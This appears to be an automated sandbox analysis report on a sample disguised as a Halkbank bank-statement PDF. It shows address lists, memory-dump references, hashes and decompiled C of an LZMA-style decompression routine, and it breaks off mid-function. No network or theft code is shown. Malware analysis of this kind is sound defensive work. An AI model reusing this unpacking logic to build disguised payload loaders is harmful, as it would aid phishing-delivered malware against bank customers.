                                                                    0x00406d29
                                                                    0x00406d29
                                                                    0x00406d29
                                                                    0x00406d2c
                                                                    0x00406d2f
                                                                    0x00406d32
                                                                    0x00406d37
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406d5f
                                                                    0x00406d61
                                                                    0x00406d64
                                                                    0x00406dd5
                                                                    0x00406dd8
                                                                    0x00406ddb
                                                                    0x00406de2
                                                                    0x00406dec
                                                                    0x00000000
                                                                    0x00406dec
                                                                    0x00406d66
                                                                    0x00406d6a
                                                                    0x00406d6d
                                                                    0x00406d6f
                                                                    0x00406d72
                                                                    0x00406d75
                                                                    0x00406d77
                                                                    0x00406d7a
                                                                    0x00406d7c
                                                                    0x00406d81
                                                                    0x00406d84
                                                                    0x00406d87
                                                                    0x00406d8b
                                                                    0x00406d92
                                                                    0x00406d95
                                                                    0x00406d9c
                                                                    0x00406da0
                                                                    0x00406da8
                                                                    0x00406da8
                                                                    0x00406da8
                                                                    0x00406da2
                                                                    0x00406da2
                                                                    0x00406da2
                                                                    0x00406d97
                                                                    0x00406d97
                                                                    0x00406d97
                                                                    0x00406dac
                                                                    0x00406daf
                                                                    0x00406dcd
                                                                    0x00406dcf
                                                                    0x00000000
                                                                    0x00406db1
                                                                    0x00406db1
                                                                    0x00406db4
                                                                    0x00406db7
                                                                    0x00406dba
                                                                    0x00406dbc
                                                                    0x00406dbc
                                                                    0x00406dbc
                                                                    0x00406dbf
                                                                    0x00406dc2
                                                                    0x00406dc4
                                                                    0x00406dc5
                                                                    0x00406dc8
                                                                    0x00000000
                                                                    0x00406dc8
                                                                    0x00000000
                                                                    0x00406ffe
                                                                    0x00407002
                                                                    0x00407020
                                                                    0x00407023
                                                                    0x0040702a
                                                                    0x0040702d
                                                                    0x00407030
                                                                    0x00407033
                                                                    0x00407036
                                                                    0x00407039
                                                                    0x0040703b
                                                                    0x00407042
                                                                    0x00407043
                                                                    0x00407045
                                                                    0x00407048
                                                                    0x0040704b
                                                                    0x0040704e
                                                                    0x0040704e
                                                                    0x00407053
                                                                    0x00000000
                                                                    0x00407053
                                                                    0x00407004
                                                                    0x00407007
                                                                    0x0040700a
                                                                    0x00407014
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407068
                                                                    0x0040706c
                                                                    0x0040708f
                                                                    0x00407092
                                                                    0x00407095
                                                                    0x0040709f
                                                                    0x0040706e
                                                                    0x0040706e
                                                                    0x00407071
                                                                    0x00407074
                                                                    0x00407077
                                                                    0x00407084
                                                                    0x00407087
                                                                    0x00407087
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040711c
                                                                    0x00407120
                                                                    0x00407127
                                                                    0x0040712a
                                                                    0x0040712d
                                                                    0x00407137
                                                                    0x00000000
                                                                    0x00407137
                                                                    0x00407122
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407143
                                                                    0x00407147
                                                                    0x0040714e
                                                                    0x00407151
                                                                    0x00407154
                                                                    0x00407149
                                                                    0x00407149
                                                                    0x00407149
                                                                    0x00407157
                                                                    0x0040715a
                                                                    0x0040715d
                                                                    0x0040715d
                                                                    0x00407160
                                                                    0x00407163
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407203
                                                                    0x00407203
                                                                    0x00407207
                                                                    0x004075a5
                                                                    0x00000000
                                                                    0x004075a5
                                                                    0x0040720d
                                                                    0x00407210
                                                                    0x00407213
                                                                    0x00407217
                                                                    0x0040721a
                                                                    0x00407220
                                                                    0x00407222
                                                                    0x00407222
                                                                    0x00407222
                                                                    0x00407225
                                                                    0x00407228
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406df8
                                                                    0x00406df8
                                                                    0x00406dfc
                                                                    0x00407569
                                                                    0x00000000
                                                                    0x00407569
                                                                    0x00406e02
                                                                    0x00406e05
                                                                    0x00406e08
                                                                    0x00406e0c
                                                                    0x00406e0f
                                                                    0x00406e15
                                                                    0x00406e17
                                                                    0x00406e17
                                                                    0x00406e17
                                                                    0x00406e1a
                                                                    0x00406e1d
                                                                    0x00406e1d
                                                                    0x00406e20
                                                                    0x00406e23
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406e29
                                                                    0x00406e2f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406e35
                                                                    0x00406e35
                                                                    0x00406e39
                                                                    0x00406e3c
                                                                    0x00406e3f
                                                                    0x00406e42
                                                                    0x00406e45
                                                                    0x00406e46
                                                                    0x00406e49
                                                                    0x00406e4b
                                                                    0x00406e51
                                                                    0x00406e54
                                                                    0x00406e57
                                                                    0x00406e5a
                                                                    0x00406e5d
                                                                    0x00406e60
                                                                    0x00406e63
                                                                    0x00406e7f
                                                                    0x00406e82
                                                                    0x00406e85
                                                                    0x00406e88
                                                                    0x00406e8f
                                                                    0x00406e93
                                                                    0x00406e95
                                                                    0x00406e99
                                                                    0x00406e65
                                                                    0x00406e65
                                                                    0x00406e69
                                                                    0x00406e71
                                                                    0x00406e76
                                                                    0x00406e78
                                                                    0x00406e7a
                                                                    0x00406e7a
                                                                    0x00406e9c
                                                                    0x00406ea3
                                                                    0x00406ea6
                                                                    0x00000000
                                                                    0x00406eac
                                                                    0x00000000
                                                                    0x00406eac
                                                                    0x00000000
                                                                    0x00406eb1
                                                                    0x00406eb1
                                                                    0x00406eb5
                                                                    0x00407575
                                                                    0x00000000
                                                                    0x00407575
                                                                    0x00406ebb
                                                                    0x00406ebe
                                                                    0x00406ec1
                                                                    0x00406ec5
                                                                    0x00406ec8
                                                                    0x00406ece
                                                                    0x00406ed0
                                                                    0x00406ed0
                                                                    0x00406ed0
                                                                    0x00406ed3
                                                                    0x00406ed6
                                                                    0x00406ed6
                                                                    0x00406ed6
                                                                    0x00406edc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406ede
                                                                    0x00406ee1
                                                                    0x00406ee4
                                                                    0x00406ee7
                                                                    0x00406eea
                                                                    0x00406eed
                                                                    0x00406ef0
                                                                    0x00406ef3
                                                                    0x00406ef6
                                                                    0x00406ef9
                                                                    0x00406efc
                                                                    0x00406f14
                                                                    0x00406f17
                                                                    0x00406f1a
                                                                    0x00406f1d
                                                                    0x00406f1d
                                                                    0x00406f20
                                                                    0x00406f24
                                                                    0x00406f26
                                                                    0x00406efe
                                                                    0x00406efe
                                                                    0x00406f06
                                                                    0x00406f0b
                                                                    0x00406f0d
                                                                    0x00406f0f
                                                                    0x00406f0f
                                                                    0x00406f29
                                                                    0x00406f30
                                                                    0x00406f33
                                                                    0x00000000
                                                                    0x00406f35
                                                                    0x00000000
                                                                    0x00406f35
                                                                    0x00406f33
                                                                    0x00406f3a
                                                                    0x00406f3a
                                                                    0x00406f3a
                                                                    0x00406f3a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406f75
                                                                    0x00406f75
                                                                    0x00406f79
                                                                    0x00407581
                                                                    0x00000000
                                                                    0x00407581
                                                                    0x00406f7f
                                                                    0x00406f82
                                                                    0x00406f85
                                                                    0x00406f89
                                                                    0x00406f8c
                                                                    0x00406f92
                                                                    0x00406f94
                                                                    0x00406f94
                                                                    0x00406f94
                                                                    0x00406f97
                                                                    0x00406f9a
                                                                    0x00406f9a
                                                                    0x00406fa0
                                                                    0x00406f3e
                                                                    0x00406f3e
                                                                    0x00406f41
                                                                    0x00000000
                                                                    0x00406f41
                                                                    0x00406fa2
                                                                    0x00406fa2
                                                                    0x00406fa5
                                                                    0x00406fa8
                                                                    0x00406fab
                                                                    0x00406fae
                                                                    0x00406fb1
                                                                    0x00406fb4
                                                                    0x00406fb7
                                                                    0x00406fba
                                                                    0x00406fbd
                                                                    0x00406fc0
                                                                    0x00406fd8
                                                                    0x00406fdb
                                                                    0x00406fde
                                                                    0x00406fe1
                                                                    0x00406fe1
                                                                    0x00406fe4
                                                                    0x00406fe8
                                                                    0x00406fea
                                                                    0x00406fc2
                                                                    0x00406fc2
                                                                    0x00406fca
                                                                    0x00406fcf
                                                                    0x00406fd1
                                                                    0x00406fd3
                                                                    0x00406fd3
                                                                    0x00406fed
                                                                    0x00406ff4
                                                                    0x00406ff7
                                                                    0x00000000
                                                                    0x00406ff9
                                                                    0x00000000
                                                                    0x00406ff9
                                                                    0x00000000
                                                                    0x00407286
                                                                    0x00407286
                                                                    0x0040728a
                                                                    0x004075b1
                                                                    0x00000000
                                                                    0x004075b1
                                                                    0x00407290
                                                                    0x00407293
                                                                    0x00407296
                                                                    0x0040729a
                                                                    0x0040729d
                                                                    0x004072a3
                                                                    0x004072a5
                                                                    0x004072a5
                                                                    0x004072a5
                                                                    0x004072a8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407395
                                                                    0x00407399
                                                                    0x004073bb
                                                                    0x004073be
                                                                    0x004073c8
                                                                    0x00000000
                                                                    0x004073c8
                                                                    0x0040739b
                                                                    0x0040739e
                                                                    0x004073a2
                                                                    0x004073a5
                                                                    0x004073a5
                                                                    0x004073a8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407452
                                                                    0x00407456
                                                                    0x00407474
                                                                    0x00407474
                                                                    0x00407474
                                                                    0x0040747b
                                                                    0x00407482
                                                                    0x00407489
                                                                    0x00407489
                                                                    0x00000000
                                                                    0x00407489
                                                                    0x00407458
                                                                    0x0040745b
                                                                    0x0040745e
                                                                    0x00407461
                                                                    0x00407468
                                                                    0x004073ac
                                                                    0x004073ac
                                                                    0x004073af
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407543
                                                                    0x00407546
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040717d
                                                                    0x0040717f
                                                                    0x00407186
                                                                    0x00407187
                                                                    0x00407189
                                                                    0x0040718c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407194
                                                                    0x00407197
                                                                    0x0040719a
                                                                    0x0040719c
                                                                    0x0040719e
                                                                    0x0040719e
                                                                    0x0040719f
                                                                    0x004071a2
                                                                    0x004071a9
                                                                    0x004071ac
                                                                    0x004071ba
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407490
                                                                    0x00407490
                                                                    0x00407493
                                                                    0x0040749a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040749f
                                                                    0x0040749f
                                                                    0x004074a3
                                                                    0x004075db
                                                                    0x00000000
                                                                    0x004075db
                                                                    0x004074a9
                                                                    0x004074ac
                                                                    0x004074af
                                                                    0x004074b3
                                                                    0x004074b6
                                                                    0x004074bc
                                                                    0x004074be
                                                                    0x004074be
                                                                    0x004074be
                                                                    0x004074c1
                                                                    0x004074c4
                                                                    0x004074c4
                                                                    0x004074c4
                                                                    0x004074c4
                                                                    0x004074c7
                                                                    0x004074c7
                                                                    0x004074cb
                                                                    0x0040752b
                                                                    0x0040752e
                                                                    0x00407533
                                                                    0x00407534
                                                                    0x00407536
                                                                    0x00407538
                                                                    0x0040753b
                                                                    0x00000000
                                                                    0x0040753b
                                                                    0x004074cd
                                                                    0x004074d3
                                                                    0x004074d6
                                                                    0x004074d9
                                                                    0x004074dc
                                                                    0x004074df
                                                                    0x004074e2
                                                                    0x004074e5
                                                                    0x004074e8
                                                                    0x004074eb
                                                                    0x004074ee
                                                                    0x00407507
                                                                    0x0040750a
                                                                    0x0040750d
                                                                    0x00407510
                                                                    0x00407514
                                                                    0x00407516
                                                                    0x00407516
                                                                    0x00407517
                                                                    0x0040751a
                                                                    0x004074f0
                                                                    0x004074f0
                                                                    0x004074f8
                                                                    0x004074fd
                                                                    0x004074ff
                                                                    0x00407502
                                                                    0x00407502
                                                                    0x0040751d
                                                                    0x00407524
                                                                    0x00000000
                                                                    0x00407526
                                                                    0x00000000
                                                                    0x00407526
                                                                    0x00000000
                                                                    0x004071c2
                                                                    0x004071c5
                                                                    0x004071fb
                                                                    0x0040732b
                                                                    0x0040732b
                                                                    0x0040732b
                                                                    0x0040732b
                                                                    0x0040732e
                                                                    0x0040732e
                                                                    0x00407331
                                                                    0x00407333
                                                                    0x004075bd
                                                                    0x00000000
                                                                    0x004075bd
                                                                    0x00407339
                                                                    0x0040733c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407342
                                                                    0x00407346
                                                                    0x00407349
                                                                    0x00407349
                                                                    0x00407349
                                                                    0x00000000
                                                                    0x00407349
                                                                    0x004071c7
                                                                    0x004071c9
                                                                    0x004071cb
                                                                    0x004071cd
                                                                    0x004071d0
                                                                    0x004071d1
                                                                    0x004071d3
                                                                    0x004071d5
                                                                    0x004071d8
                                                                    0x004071db
                                                                    0x004071f1
                                                                    0x004071f6
                                                                    0x0040722e
                                                                    0x0040722e
                                                                    0x00407232
                                                                    0x0040725e
                                                                    0x00407260
                                                                    0x00407267
                                                                    0x0040726a
                                                                    0x0040726d
                                                                    0x0040726d
                                                                    0x00407272
                                                                    0x00407272
                                                                    0x00407274
                                                                    0x00407277
                                                                    0x0040727e
                                                                    0x00407281
                                                                    0x004072ae
                                                                    0x004072ae
                                                                    0x004072b1
                                                                    0x004072b4
                                                                    0x00407328
                                                                    0x00407328
                                                                    0x00407328
                                                                    0x00000000
                                                                    0x00407328
                                                                    0x004072b6
                                                                    0x004072bc
                                                                    0x004072bf
                                                                    0x004072c2
                                                                    0x004072c5
                                                                    0x004072c8
                                                                    0x004072cb
                                                                    0x004072ce
                                                                    0x004072d1
                                                                    0x004072d4
                                                                    0x004072d7
                                                                    0x004072f0
                                                                    0x004072f2
                                                                    0x004072f5
                                                                    0x004072f6
                                                                    0x004072f9
                                                                    0x004072fb
                                                                    0x004072fe
                                                                    0x00407300
                                                                    0x00407302
                                                                    0x00407305
                                                                    0x00407307
                                                                    0x0040730a
                                                                    0x0040730e
                                                                    0x00407310
                                                                    0x00407310
                                                                    0x00407311
                                                                    0x00407314
                                                                    0x00407317
                                                                    0x004072d9
                                                                    0x004072d9
                                                                    0x004072e1
                                                                    0x004072e6
                                                                    0x004072e8
                                                                    0x004072eb
                                                                    0x004072eb
                                                                    0x0040731a
                                                                    0x00407321
                                                                    0x004072ab
                                                                    0x004072ab
                                                                    0x004072ab
                                                                    0x004072ab
                                                                    0x00000000
                                                                    0x00407323
                                                                    0x00000000
                                                                    0x00407323
                                                                    0x00407321
                                                                    0x00407234
                                                                    0x00407237
                                                                    0x00407239
                                                                    0x0040723c
                                                                    0x0040723f
                                                                    0x00407242
                                                                    0x00407244
                                                                    0x00407247
                                                                    0x0040724a
                                                                    0x0040724a
                                                                    0x0040724d
                                                                    0x0040724d
                                                                    0x00407250
                                                                    0x00407257
                                                                    0x0040722b
                                                                    0x0040722b
                                                                    0x0040722b
                                                                    0x0040722b
                                                                    0x00000000
                                                                    0x00407259
                                                                    0x00000000
                                                                    0x00407259
                                                                    0x00407257
                                                                    0x004071dd
                                                                    0x004071e0
                                                                    0x004071e2
                                                                    0x004071e5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406f44
                                                                    0x00406f44
                                                                    0x00406f48
                                                                    0x0040758d
                                                                    0x00000000
                                                                    0x0040758d
                                                                    0x00406f4e
                                                                    0x00406f51
                                                                    0x00406f54
                                                                    0x00406f57
                                                                    0x00406f5a
                                                                    0x00406f5d
                                                                    0x00406f60
                                                                    0x00406f62
                                                                    0x00406f65
                                                                    0x00406f68
                                                                    0x00406f6b
                                                                    0x00406f6d
                                                                    0x00406f6d
                                                                    0x00406f6d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040734c
                                                                    0x0040734c
                                                                    0x0040734c
                                                                    0x00407350
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407356
                                                                    0x00407359
                                                                    0x0040735c
                                                                    0x0040735f
                                                                    0x00407361
                                                                    0x00407361
                                                                    0x00407361
                                                                    0x00407364
                                                                    0x00407367
                                                                    0x0040736a
                                                                    0x0040736d
                                                                    0x00407370
                                                                    0x00407373
                                                                    0x00407374
                                                                    0x00407376
                                                                    0x00407376
                                                                    0x00407376
                                                                    0x00407379
                                                                    0x0040737c
                                                                    0x0040737f
                                                                    0x00407382
                                                                    0x00407385
                                                                    0x00407389
                                                                    0x0040738b
                                                                    0x0040738e
                                                                    0x00000000
                                                                    0x00407390
                                                                    0x00000000
                                                                    0x00407390
                                                                    0x0040738e
                                                                    0x004075c3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406bf2

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                    • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                                                    • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                    • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 98%
                                                                    			E00406BB0(void* __ecx) {
                                                                    				void* _v8;
                                                                    				void* _v12;
                                                                    				signed int _v16;
                                                                    				unsigned int _v20;
                                                                    				signed int _v24;
                                                                    				signed int _v28;
                                                                    				signed int _v32;
                                                                    				signed int _v36;
                                                                    				signed int _v40;
                                                                    				signed int _v44;
                                                                    				signed int _v48;
                                                                    				signed int _v52;
                                                                    				signed int _v56;
                                                                    				signed int _v60;
                                                                    				signed int _v64;
                                                                    				signed int _v68;
                                                                    				signed int _v72;
                                                                    				signed int _v76;
                                                                    				signed int _v80;
                                                                    				signed int _v84;
                                                                    				signed int _v88;
                                                                    				signed int _v92;
                                                                    				signed int _v95;
                                                                    				signed int _v96;
                                                                    				signed int _v100;
                                                                    				signed int _v104;
                                                                    				signed int _v108;
                                                                    				signed int _v112;
                                                                    				signed int _v116;
                                                                    				signed int _v120;
                                                                    				intOrPtr _v124;
                                                                    				signed int _v128;
                                                                    				signed int _v132;
                                                                    				signed int _v136;
                                                                    				void _v140;
                                                                    				void* _v148;
                                                                    				signed int _t537;
                                                                    				signed int _t538;
                                                                    				signed int _t572;
                                                                    
                                                                    				_t572 = 0x22;
                                                                    				_v148 = __ecx;
                                                                    				memcpy( &_v140, __ecx, _t572 << 2);
                                                                    				if(_v52 == 0xffffffff) {
                                                                    					return 1;
                                                                    				}
                                                                    				while(1) {
                                                                    					L3:
                                                                    					_t537 = _v140;
                                                                    					if(_t537 > 0x1c) {
                                                                    						break;
                                                                    					}
                                                                    					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
                                                                    						case 0:
                                                                    							__eflags = _v112;
                                                                    							if(_v112 == 0) {
                                                                    								goto L173;
                                                                    							}
                                                                    							_v112 = _v112 - 1;
                                                                    							_v116 = _v116 + 1;
                                                                    							_t537 =  *_v116;
                                                                    							__eflags = _t537 - 0xe1;
                                                                    							if(_t537 > 0xe1) {
                                                                    								goto L174;
                                                                    							}
                                                                    							_t542 = _t537 & 0x000000ff;
                                                                    							_push(0x2d);
                                                                    							asm("cdq");
                                                                    							_pop(_t576);
                                                                    							_push(9);
                                                                    							_pop(_t577);
                                                                    							_t622 = _t542 / _t576;
                                                                    							_t544 = _t542 % _t576 & 0x000000ff;
                                                                    							asm("cdq");
                                                                    							_t617 = _t544 % _t577 & 0x000000ff;
                                                                    							_v64 = _t617;
                                                                    							_v32 = (1 << _t622) - 1;
                                                                    							_v28 = (1 << _t544 / _t577) - 1;
                                                                    							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                                                    							__eflags = 0x600 - _v124;
                                                                    							if(0x600 == _v124) {
                                                                    								L12:
                                                                    								__eflags = _t625;
                                                                    								if(_t625 == 0) {
                                                                    									L14:
                                                                    									_v76 = _v76 & 0x00000000;
                                                                    									_v68 = _v68 & 0x00000000;
                                                                    									goto L17;
                                                                    								} else {
                                                                    									goto L13;
                                                                    								}
                                                                    								do {
                                                                    									L13:
                                                                    									_t625 = _t625 - 1;
                                                                    									__eflags = _t625;
                                                                    									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                                                    								} while (_t625 != 0);
                                                                    								goto L14;
                                                                    							}
                                                                    							__eflags = _v8;
                                                                    							if(_v8 != 0) {
                                                                    								GlobalFree(_v8);
                                                                    							}
                                                                    							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                                                    							__eflags = _t537;
                                                                    							_v8 = _t537;
                                                                    							if(_t537 == 0) {
                                                                    								goto L174;
                                                                    							} else {
                                                                    								_v124 = 0x600;
                                                                    								goto L12;
                                                                    							}
                                                                    						case 1:
                                                                    							L15:
                                                                    							__eflags = _v112;
                                                                    							if(_v112 == 0) {
                                                                    								_v140 = 1;
                                                                    								goto L173;
                                                                    							}
                                                                    							_v112 = _v112 - 1;
                                                                    							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                                                    							_v116 = _v116 + 1;
                                                                    							_t50 =  &_v76;
                                                                    							 *_t50 = _v76 + 1;
                                                                    							__eflags =  *_t50;
                                                                    							L17:
                                                                    							__eflags = _v76 - 4;
                                                                    							if(_v76 < 4) {
                                                                    								goto L15;
                                                                    							}
                                                                    							_t550 = _v68;
                                                                    							__eflags = _t550 - _v120;
                                                                    							if(_t550 == _v120) {
                                                                    								L22:
                                                                    								_v76 = 5;
                                                                    								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                                                    								goto L25;
                                                                    							}
                                                                    							__eflags = _v12;
                                                                    							_v120 = _t550;
                                                                    							if(_v12 != 0) {
                                                                    								GlobalFree(_v12);
                                                                    							}
                                                                    							_t537 = GlobalAlloc(0x40, _v68); // executed
                                                                    							__eflags = _t537;
                                                                    							_v12 = _t537;
                                                                    							if(_t537 == 0) {
                                                                    								goto L174;
                                                                    							} else {
                                                                    								goto L22;
                                                                    							}
                                                                    						case 2:
                                                                    							L26:
                                                                    							_t557 = _v100 & _v32;
                                                                    							_v136 = 6;
                                                                    							_v80 = _t557;
                                                                    							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                                                    							goto L135;
                                                                    						case 3:
                                                                    							L23:
                                                                    							__eflags = _v112;
                                                                    							if(_v112 == 0) {
                                                                    								_v140 = 3;
                                                                    								goto L173;
                                                                    							}
                                                                    							_v112 = _v112 - 1;
                                                                    							_t72 =  &_v116;
                                                                    							 *_t72 = _v116 + 1;
                                                                    							__eflags =  *_t72;
                                                                    							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                    							L25:
                                                                    							_v76 = _v76 - 1;
                                                                    							__eflags = _v76;
                                                                    							if(_v76 != 0) {
                                                                    								goto L23;
                                                                    							}
                                                                    							goto L26;
                                                                    						case 4:
                                                                    							L136:
                                                                    							_t559 =  *_t626;
                                                                    							_t610 = _t559 & 0x0000ffff;
                                                                    							_t591 = (_v20 >> 0xb) * _t610;
                                                                    							__eflags = _v16 - _t591;
                                                                    							if(_v16 >= _t591) {
                                                                    								_v20 = _v20 - _t591;
                                                                    								_v16 = _v16 - _t591;
                                                                    								_v68 = 1;
                                                                    								_t560 = _t559 - (_t559 >> 5);
                                                                    								__eflags = _t560;
                                                                    								 *_t626 = _t560;
                                                                    							} else {
                                                                    								_v20 = _t591;
                                                                    								_v68 = _v68 & 0x00000000;
                                                                    								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                                                    							}
                                                                    							__eflags = _v20 - 0x1000000;
                                                                    							if(_v20 >= 0x1000000) {
                                                                    								goto L142;
                                                                    							} else {
                                                                    								goto L140;
                                                                    							}
                                                                    						case 5:
                                                                    							L140:
                                                                    							__eflags = _v112;
                                                                    							if(_v112 == 0) {
                                                                    								_v140 = 5;
                                                                    								goto L173;
                                                                    							}
                                                                    							_v20 = _v20 << 8;
                                                                    							_v112 = _v112 - 1;
                                                                    							_t464 =  &_v116;
                                                                    							 *_t464 = _v116 + 1;
                                                                    							__eflags =  *_t464;
                                                                    							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                    							L142:
                                                                    							_t561 = _v136;
                                                                    							goto L143;
                                                                    						case 6:
                                                                    							__edx = 0;
                                                                    							__eflags = _v68;
                                                                    							if(_v68 != 0) {
                                                                    								__eax = _v8;
                                                                    								__ecx = _v60;
                                                                    								_v56 = 1;
                                                                    								_v136 = 7;
                                                                    								__esi = _v8 + 0x180 + _v60 * 2;
                                                                    								goto L135;
                                                                    							}
                                                                    							__eax = _v96 & 0x000000ff;
                                                                    							__esi = _v100;
                                                                    							__cl = 8;
                                                                    							__cl = 8 - _v64;
                                                                    							__esi = _v100 & _v28;
                                                                    							__eax = (_v96 & 0x000000ff) >> 8;
                                                                    							__ecx = _v64;
                                                                    							__esi = (_v100 & _v28) << 8;
                                                                    							__ecx = _v8;
                                                                    							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                                                    							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                                                    							__eflags = _v60 - 4;
                                                                    							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                    							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                    							if(_v60 >= 4) {
                                                                    								__eflags = _v60 - 0xa;
                                                                    								if(_v60 >= 0xa) {
                                                                    									_t103 =  &_v60;
                                                                    									 *_t103 = _v60 - 6;
                                                                    									__eflags =  *_t103;
                                                                    								} else {
                                                                    									_v60 = _v60 - 3;
                                                                    								}
                                                                    							} else {
                                                                    								_v60 = 0;
                                                                    							}
                                                                    							__eflags = _v56 - __edx;
                                                                    							if(_v56 == __edx) {
                                                                    								__ebx = 0;
                                                                    								__ebx = 1;
                                                                    								goto L63;
                                                                    							}
                                                                    							__eax = _v24;
                                                                    							__eax = _v24 - _v48;
                                                                    							__eflags = __eax - _v120;
                                                                    							if(__eax >= _v120) {
                                                                    								__eax = __eax + _v120;
                                                                    								__eflags = __eax;
                                                                    							}
                                                                    							__ecx = _v12;
                                                                    							__ebx = 0;
                                                                    							__ebx = 1;
                                                                    							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                    							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                                                    							goto L43;
                                                                    						case 7:
                                                                    							__eflags = _v68 - 1;
                                                                    							if(_v68 != 1) {
                                                                    								__eax = _v40;
                                                                    								_v132 = 0x16;
                                                                    								_v36 = _v40;
                                                                    								__eax = _v44;
                                                                    								_v40 = _v44;
                                                                    								__eax = _v48;
                                                                    								_v44 = _v48;
                                                                    								__eax = 0;
                                                                    								__eflags = _v60 - 7;
                                                                    								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                    								__al = __al & 0x000000fd;
                                                                    								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                    								_v60 = (__eflags >= 0) - 1 + 0xa;
                                                                    								__eax = _v8;
                                                                    								__eax = _v8 + 0x664;
                                                                    								__eflags = __eax;
                                                                    								_v92 = __eax;
                                                                    								goto L71;
                                                                    							}
                                                                    							__eax = _v8;
                                                                    							__ecx = _v60;
                                                                    							_v136 = 8;
                                                                    							__esi = _v8 + 0x198 + _v60 * 2;
                                                                    							goto L135;
                                                                    						case 8:
                                                                    							__eflags = _v68;
                                                                    							if(_v68 != 0) {
                                                                    								__eax = _v8;
                                                                    								__ecx = _v60;
                                                                    								_v136 = 0xa;
                                                                    								__esi = _v8 + 0x1b0 + _v60 * 2;
                                                                    							} else {
                                                                    								__eax = _v60;
                                                                    								__ecx = _v8;
                                                                    								__eax = _v60 + 0xf;
                                                                    								_v136 = 9;
                                                                    								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                                                    								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                                                    							}
                                                                    							goto L135;
                                                                    						case 9:
